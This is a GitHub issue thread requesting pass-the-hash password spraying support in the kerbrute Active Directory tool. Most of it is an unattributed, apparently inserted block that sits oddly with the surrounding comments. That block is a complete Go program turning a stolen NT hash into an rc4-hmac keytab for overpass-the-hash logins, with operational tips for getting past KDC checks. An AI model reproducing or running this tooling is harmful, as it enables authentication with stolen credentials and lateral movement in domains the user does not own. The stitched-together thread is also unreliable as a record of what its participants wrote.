
[Feature Request] Pass the Hash Support

Open IppSec opened this issue 3 years ago • 3 comments

It would be nice to have the ability to spray user accounts with NTLM hashes. The two main use cases I imagine for this are:

  • Pulling an NTLM Hash off a local workstation, then spraying AD to look for password re-use
  • Testing passwords from domain controller backups (old copies of NTDS.DIT).

Currently, this can be done with https://github.com/3gstudent/pyKerbrute, but is an extremely hacky solution using Python2.

IppSec avatar Apr 07 '21 13:04 IppSec

Good idea! This would require a bit of a hack in gokrb5, but it can work. Basically, instead of calling client.NewWithPassword, we'll call client.NewWithKeytab and manually create a temporary keytab with the NTLM hash as the encryption key. The "hack" will just be to change the library so it can accept a raw encryption key in RC4 instead of the expected plaintext password when calling AddEntry. Should have a working branch in a few days. Do you have a lab you could test in? My AD lab is down, unfortunately; I don't even have a working DC I can try kerbrute against at the moment.

ropnop avatar Apr 07 '21 14:04 ropnop
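The approach ropnop sketches above (a temporary keytab whose rc4-hmac key is the NT hash, fed to client.NewWithKeytab instead of deriving a key from a plaintext password) does not need a patched AddEntry if the keytab is written as bytes, since the rc4-hmac (etype 23) key is simply the 16-byte NT hash. The following Go program is an added example for this thread, not kerbrute or gokrb5 code: it serialises one such entry in the MIT keytab format (version 0x0502) and parses it back so the result can be checked. The user name, realm, kvno, and the hex NT hash are constructed sample values; the principal name type 1 (KRB_NT_PRINCIPAL) and the keytab layout follow the MIT format that gokrb5's keytab loader reads, but nothing here calls gokrb5.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"io"
	"os"
	"strings"
	"time"
)

// etypeRC4HMAC is Kerberos encryption type 23; its key is the raw NT hash,
// which is what makes "pass the hash" via Kerberos (overpass-the-hash) work.
const etypeRC4HMAC = 23

// ntPrincipal is name type KRB_NT_PRINCIPAL (1), the type for a user account.
const ntPrincipal = 1

// BuildRC4Keytab returns an MIT keytab (version 0x0502) containing a single
// rc4-hmac entry for user@REALM whose key is the 16-byte NT hash ntHash.
func BuildRC4Keytab(user, realm string, ntHash []byte, kvno uint32, ts time.Time) ([]byte, error) {
	if len(ntHash) != 16 {
		return nil, fmt.Errorf("NT hash must be 16 bytes, got %d", len(ntHash))
	}
	realm = strings.ToUpper(realm) // Kerberos realms are upper-case by convention
	var e bytes.Buffer
	// binary.Write into a bytes.Buffer cannot fail for fixed-size values.
	w := func(v interface{}) { _ = binary.Write(&e, binary.BigEndian, v) }
	counted := func(b []byte) { w(uint16(len(b))); e.Write(b) }

	w(uint16(1))           // number of name components (the realm is not counted in v2)
	counted([]byte(realm)) // realm
	counted([]byte(user))  // single component: the sAMAccountName
	w(uint32(ntPrincipal)) // name type (present in 0x0502 keytabs)
	w(uint32(ts.Unix()))   // timestamp
	w(uint8(kvno & 0xff))  // 8-bit kvno
	w(uint16(etypeRC4HMAC))
	counted(ntHash) // keyblock: etype + counted key octets
	w(kvno)         // optional 32-bit kvno

	var kt bytes.Buffer
	kt.Write([]byte{0x05, 0x02})
	_ = binary.Write(&kt, binary.BigEndian, int32(e.Len()))
	kt.Write(e.Bytes())
	return kt.Bytes(), nil
}

// ParseFirstEntry decodes the first entry of a 0x0502 keytab; it exists so the
// bytes produced by BuildRC4Keytab can be verified without a Kerberos library.
func ParseFirstEntry(kt []byte) (user, realm string, etype uint16, key []byte, err error) {
	r := bytes.NewReader(kt)
	var ver [2]byte
	if _, err = io.ReadFull(r, ver[:]); err != nil {
		return
	}
	if ver != [2]byte{0x05, 0x02} {
		err = fmt.Errorf("unsupported keytab version %x", ver)
		return
	}
	var size int32
	if err = binary.Read(r, binary.BigEndian, &size); err != nil {
		return
	}
	entry := make([]byte, size)
	if _, err = io.ReadFull(r, entry); err != nil {
		return
	}
	er := bytes.NewReader(entry)
	rd := func(v interface{}) {
		if err == nil {
			err = binary.Read(er, binary.BigEndian, v)
		}
	}
	counted := func() []byte {
		var n uint16
		rd(&n)
		b := make([]byte, n)
		if err == nil {
			_, err = io.ReadFull(er, b)
		}
		return b
	}
	var ncomp uint16
	rd(&ncomp)
	realm = string(counted())
	comps := make([]string, 0, ncomp)
	for i := 0; i < int(ncomp) && err == nil; i++ {
		comps = append(comps, string(counted()))
	}
	var nameType, ts uint32
	var vno8 uint8
	rd(&nameType)
	rd(&ts)
	rd(&vno8)
	rd(&etype)
	key = counted()
	user = strings.Join(comps, "/")
	return
}

func main() {
	if len(os.Args) != 5 {
		fmt.Fprintln(os.Stderr, "usage: pth-keytab <user> <REALM> <nt-hash-hex> <out.keytab>")
		os.Exit(2)
	}
	h, err := hex.DecodeString(os.Args[3])
	if err != nil {
		fmt.Fprintln(os.Stderr, "bad hex:", err)
		os.Exit(1)
	}
	kt, err := BuildRC4Keytab(os.Args[1], os.Args[2], h, 1, time.Now())
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	if err := os.WriteFile(os.Args[4], kt, 0o600); err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	fmt.Printf("wrote %d-byte keytab for %s@%s\n", len(kt), os.Args[1], strings.ToUpper(os.Args[2]))
}
```

The resulting file can be handed to gokrb5's keytab loader and then to client.NewWithKeytab as described in the comment above. Two caveats for anyone testing this: the client must request etype 23 in the AS-REQ (otherwise the KDC issues AES pre-auth challenges and the NT hash is useless), and a domain where RC4 has been disabled for the account or the DC will reject the request outright, so a KRB-ERROR there means "RC4 not allowed", not "wrong hash".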

Any updates on this subject? I can help with testing.

P4cm4n90 avatar Nov 10 '22 08:11 P4cm4n90

I can help too.

TryA9ain avatar Mar 06 '23 05:03 TryA9ain